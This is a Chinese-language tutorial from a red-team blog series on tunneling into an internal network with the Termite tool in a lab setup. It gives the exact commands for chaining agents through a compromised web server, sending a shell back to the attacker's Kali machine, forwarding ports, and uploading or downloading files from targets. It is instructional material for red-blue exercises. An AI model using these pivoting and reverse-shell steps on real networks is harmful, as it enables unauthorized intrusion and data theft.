前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >ATT&CK视角下的红蓝对抗:八.内网穿透之利用Termite进行隧道穿透

ATT&CK视角下的红蓝对抗:八.内网穿透之利用Termite进行隧道穿透

原创
作者头像
一只特立独行的兔先生
修改2023-11-06 08:30:47
4770
修改2023-11-06 08:30:47
举报

一. 利用Termite进行隧道穿透

Termite是一款内网穿透工具,该工具比较小巧不到1MB大小,但功能较为强大,分为管理端admin和客户端agent。它支持多平台、在复杂内网环境下Termite渗透适用性更强,操作也极为简便,下述以它为案例进行隧道穿透。实验拓扑如图1-1所示。

图1-1通过Termite进行隧道穿透
图1-1通过Termite进行隧道穿透

假设我们获取到Web服务器的权限后,想要对靶机获取权限,此时可以使用Termite工具进行隧道穿透,利用Termite工具下载靶机的核心文件,具体环境如表1-1所示,下面进行演示。

表1-1 Termite进行隧道穿透实验环境

主机类型

IP配置

Kali攻击机

192.168.0.58

Web服务器

192.168.0.25 192.168.52.11

靶机

192.68.52.12

1.目标在公网

1)首先上传agent客户端到Web服务器,执行agent.exe -l 8888 ,开启监听Web服务器8888端口,如图1-2所示。

图1-2 监听Web服务器8888端口
图1-2 监听Web服务器8888端口

2)我们在Kali攻击机使用admin连接Web服务器开启的监听端口,执行./admin_linux_x86_64 -c 192.168.0.25 -p 8888命令,成功连接Web服务器后,使用show参数查看当前页面下存活的节点,如图1-3所示。

图1-3反向连接过程
图1-3反向连接过程

2.目标在内网

假设通过Web服务器获取到靶机的系统执行权限,由于靶机位处于内网,且它无法访问外网,可以根据下面步骤进行操作。

1)首先在Web服务器上传agent工具来开启监听8888端口,执行agent_Win32.exe -l 8888命令,开启监听,如图1-4所示。

图1-4 监听本地端口
图1-4 监听本地端口

2)Kali攻击机使用admin服务端,执行./admin_linux_x86_64 -c 192.168.0.25 -p 8888命令连接Web服务器开启监听的8888端口。如图1-5所示。

图1-5 连接Web服务器
图1-5 连接Web服务器

3)通过上传agent客户端到靶机,在靶机执行agent_win32.exe -c 192.168.52.11 -p 8888命令。注意,192.168.52.11是Web服务器内网的网卡。如图1-6所示。

图1-6 连接另一个网卡
图1-6 连接另一个网卡

4)此时在kali主机使用show命令查看,这里可以看到与靶机搭建隧道成功,下方会显示一个节点,如图1-7所示。

图1-7隧道搭建成功
图1-7隧道搭建成功

3.shell反弹

1)利用Termite工具根据上述环境进行shell反弹实验,将Web服务器的Shell反弹到Kali攻击机的1024端口,执行shell 1024命令即可,如图1-8所示。

图1-8 shell反弹到本地1024端口
图1-8 shell反弹到本地1024端口

2)在kali工具机使用nc工具进行测试, 执行nc 127.0.0.1 1024命令,可以看到已经将Web服务器的shell反弹到攻击机,如图1-9所示。

图1-9 shell反弹成功
图1-9 shell反弹成功

4.端口转发

1)利用Termite工具的lcxtran 参数进行端口转发操作,lcxtran参数使用方法即“lcxtran 本地端口 目标ip 目标端口”,使用goto命令先进入Web服务器节点,然后执行lcxtran 8080 192.168.0.25 80,此时可以将Web服务器的80端口,转发到kali攻击机的8080端口,如图1-10所示。

图1-10端口转发
图1-10端口转发

2)我们访问kali攻击机本地的8080端口,即可访问Web服务器的80端口服务,如图1-11所示。

图1-11访问Web服务器
图1-11访问Web服务器

5.上传下载文件

Termite工具也可以用于上传下载文件,admin包含upfile上传参数使用方法,使用方法也很简单,使用参数即“upfile 本地文件路径 目标路径”,downfile下载参数使用方法即“downfile 目标文件路径 本地存放路径”。

1)使用Kali攻击机上传file.txt文件到Web服务器,利用Termite工具的upfile参数,先使用goto 1命令进入节点,执行upfile /boot/1.txt C:\1.txt 命令将目录下的1.txt文件上传到Web服务器的C盘下。如图1-12所示。

图1-12下载文件
图1-12下载文件

2)在Web服务器使用命令行工具,进入C盘,dir查看当前目录,此时发现1.txt已经上传成功,如图1-13所示。

图1-13 C盘目录
图1-13 C盘目录

3)当需要下载Web服务器的文件,使用Termite工具的downfile参数,执行“downfile C:\1.txt /1.txt”命令,即可将C盘下的1.txt文件下载到Kali的根目录下,如图1-14所示。

图1-14下载到kali的根目录下
图1-14下载到kali的根目录下

4)在根目录下使用ls命令显示下载的文件,下载成功如图1-15所示。

图1-15 查看根目录下文件
图1-15 查看根目录下文件


二.本篇总结

随着隧道技术的不断更新迭代,越来越多的攻击者利用隧道技术攻击企业内网,通过本篇文章从利用Termite进行隧道穿透的方式,并且通过大量的案例来演示了多个实际常见的隧道场景,希望本篇内容对读者有所帮助。


我正在参与2023腾讯技术创作特训营第三期有奖征文,组队打卡瓜分大奖!

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一. 利用Termite进行隧道穿透
    • 1.目标在公网
      • 2.目标在内网
        • 3.shell反弹
          • 4.端口转发
            • 5.上传下载文件
            • 二.本篇总结
            相关产品与服务
            命令行工具
            腾讯云命令行工具 TCCLI 是管理腾讯云资源的统一工具。使用腾讯云命令行工具,您可以快速调用腾讯云 API 来管理您的腾讯云资源。此外,您还可以基于腾讯云的命令行工具来做自动化和脚本处理,以更多样的方式进行组合和重用。
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
            http://www.vxiaotou.com